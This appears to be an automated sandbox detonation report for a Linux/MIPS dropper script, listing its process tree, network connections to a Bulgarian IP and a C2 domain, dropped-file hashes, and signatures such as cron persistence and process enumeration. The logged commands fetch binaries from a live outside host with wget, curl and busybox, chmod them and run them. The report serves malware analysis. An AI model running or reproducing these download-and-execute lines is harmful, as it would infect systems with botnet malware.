[wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:443 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:443 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp

Files

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

MD5 64ece99ca4ab1c1405f5a3335d64a960
SHA1 b7395f2320a5bdadb78943b268708965cdbd1d74
SHA256 aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
SHA512 bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

MD5 3b78bb645b81d600c30713d416f666be
SHA1 23796112f2cce2afb2217498b5ecf2801ab550f2
SHA256 d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA512 9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

MD5 c20c610e14b8e59f5f8258a55fe7f27d
SHA1 e59a0b83d9882f2770f052a213cad25b0cbd53fc
SHA256 adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
SHA512 dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

MD5 22c527269cbd9b42f4ade79f52757efb
SHA1 c2456188a49af93b0d07af2a7cc1346d5be510bd
SHA256 100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97
SHA512 7b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

MD5 d8e96e2fdd3c610ec19128e18de5abde
SHA1 10cf691ae9779bfeca8b67e75721d0a6f275e4f9
SHA256 f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
SHA512 979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

MD5 52f72bcf31899453b40d37a7cbf55f35
SHA1 6dfca1bd70aad3e88713b02ec1669ba5a792456c
SHA256 ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495
SHA512 be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

MD5 27a1a1941f224eff6a4babf2495e3692
SHA1 86fae66a698f6280353e470ffadfb64441b03e83
SHA256 ab610b9f57ce293287cf9d4b3d47024ee73c81d8542247e26d1f0db2d5144179
SHA512 cf02927d9313f43ab5d04c7570b71cd722a5772642eac72feccdf4612985e29b399a7bbdff5de65d352b92f168c6934b0f0851a28c58a4814fffe38a0d884934

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

MD5 e9e5d79acad49bbe6c77df0385ec77aa
SHA1 53bbc8b58873cf3117743fab15bd5508421370eb
SHA256 a585eff62bec554d3d7f23aaf9b298a15eb328e8968352339db915ef427f27bd
SHA512 828680ef393890f3c8805527a473f018b212fa1d6c8534fc03bb34f910de4b8d1cd5ce3cef2c06396f225a61794205a61d9fdc6847b14ebd6d7267af9f38f381

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

MD5 8d0f8d45165dc1f3ba334ce75be39621
SHA1 1d5baece9d5af3885276735c3c20d28e161e00ff
SHA256 17441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512 a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

MD5 aadb8cc4b6eac7fce760c09262693884
SHA1 b55178ff3605f4bbfc9286d4c8ac445673232217
SHA256 b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843
SHA512 5567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

MD5 54bec959d900ad930dc662f8092da57d
SHA1 9ae7ad9018eeac5aa89bcde68ec683a364ac7d55
SHA256 b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12
SHA512 904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40

/var/spool/cron/crontabs/tmp.ZdiLay

MD5 5f706223189602b171466ca8b70375ad
SHA1 a50b6e411d9abbc71d63eab6ce8a203f4e68260f
SHA256 c8fd7eeb8ad357800f59f2399c34b6b877d4e5e6ade59b61961ca65c86cfe1b5
SHA512 8e377f755d631237ce5f744f71678a3a8c308a7e0c5bf2f1c70cf411adc760f2a7ba396c03db05d9864c37a1786cbf41a32ac65382997ae9dc233cae8810d1f3

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

MD5 a7e686eb3f74b104a5520f08cfd54eb5
SHA1 58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256 617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
SHA512 2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

MD5 c97a9c55ddb153e8bfce38f201d2cffb
SHA1 3970452f27327f98c2e3fdcabf0390067b48bd62
SHA256 138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c
SHA512 1734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

MD5 8fad5e89ce3d2b6159ac2ce2fdf7c084
SHA1 27105a304b9bb7cd8a663d1b4da1d92fd8eea355
SHA256 24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
SHA512 71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-28 01:53

Reported

2024-10-28 01:55

Platform

debian9-mipsel-20240611-en

Max time kernel

149s

Max time network

134s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.ZYRkbG /usr/bin/crontab N/A

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/697/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/879/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/968/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/990/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/7/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/21/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/698/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/836/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/860/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/885/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/991/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/5/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/24/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/68/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/77/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/421/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/940/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/976/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/998/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/2/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/4/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/14/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/67/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/826/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/850/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/880/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/947/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/1/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/6/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/847/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/934/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/18/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/150/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/317/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/869/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/949/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/965/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/1009/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/345/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/822/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/908/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/944/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/1010/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/13/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/896/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/921/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/960/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/997/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/71/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/346/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/657/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/830/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/1005/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/8/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/889/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/955/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/3/cmdline /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /bin/busybox N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /bin/busybox N/A
